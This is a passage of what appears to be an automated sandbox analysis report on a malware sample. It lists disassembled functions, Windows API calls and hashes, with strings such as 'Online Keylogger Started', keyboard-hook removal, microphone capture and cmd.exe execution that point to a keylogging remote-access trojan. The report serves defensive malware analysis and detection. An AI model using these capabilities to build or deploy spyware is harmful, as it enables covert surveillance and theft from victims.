                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                                                                              • String ID: 09~$09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 2991157371-3801775775
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 78e2c701f78f2f21ee406addc8dd1a777e33bc6e0183e51edc4fb9d657178823
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 051535c280fde2d090f53052f7cbdc28630d1d1560cc20bf5e789a7dafdcbbef
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78e2c701f78f2f21ee406addc8dd1a777e33bc6e0183e51edc4fb9d657178823
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F31C4B1D04104EFFB14EB69D441B9A77F5EF81324F2540AFE9049B2A2EB795D40CB48
                                                                                                                                                                                                                                                                                                                              Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Offline Keylogger Started
                                                                                                                                                                                                                                                                                                                              • API String ID: 465354869-4114347211
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 42d87dd279d6258ff5d503e0b82db6b5965a3986a5080896475dbd3aa09b56bd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42d87dd279d6258ff5d503e0b82db6b5965a3986a5080896475dbd3aa09b56bd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                                                                                                                                                                                                                              Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Online Keylogger Started
                                                                                                                                                                                                                                                                                                                              • API String ID: 112202259-1258561607
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7a24530a8c6c7bf2449bbacb2a28f02b771769fe06f38f3294ab8e1f5cdd9e90
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a24530a8c6c7bf2449bbacb2a28f02b771769fe06f38f3294ab8e1f5cdd9e90
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                                                                                                                                                              Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                                              • String ID: `@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2583163307-951712118
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                                                                                                                                                                                                                              Function 1000A2F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A308
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 282849329-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b0e7b0924b02afa82a32a789def5d0431f475eb5fa42c660e1d048d1314c2f9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C01191342087409BF732CF188881B0A77F1EF43680F614B5CF4D65B28ACB72B6848762
                                                                                                                                                                                                                                                                                                                              Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                                                                                                              • String ID: Connection Timeout
                                                                                                                                                                                                                                                                                                                              • API String ID: 2055531096-499159329
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bb7fc4fe1a7789bfc82961deae10ab8b0783efac5e8748f9189cf6250dc9a0de
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7fc4fe1a7789bfc82961deae10ab8b0783efac5e8748f9189cf6250dc9a0de
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                                                                                                                                                                                                                              Function 004016E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(007DE758,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(007DE758,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                                                                                                                              • String ID: T=G$X}
                                                                                                                                                                                                                                                                                                                              • API String ID: 2315374483-4249681810
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                                                                                                                              Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                                                                                                                                                                                                                              Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                                                                                                                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                                                                                                              • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e91400424476b4f3b75e0585a5867d43d21506151ccdee1c185bcfe55d68f4ab
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e91400424476b4f3b75e0585a5867d43d21506151ccdee1c185bcfe55d68f4ab
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                                                                                                              Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                                                                                                                                                              Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                                                                                                                                                                                                                              Function 10017B72 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
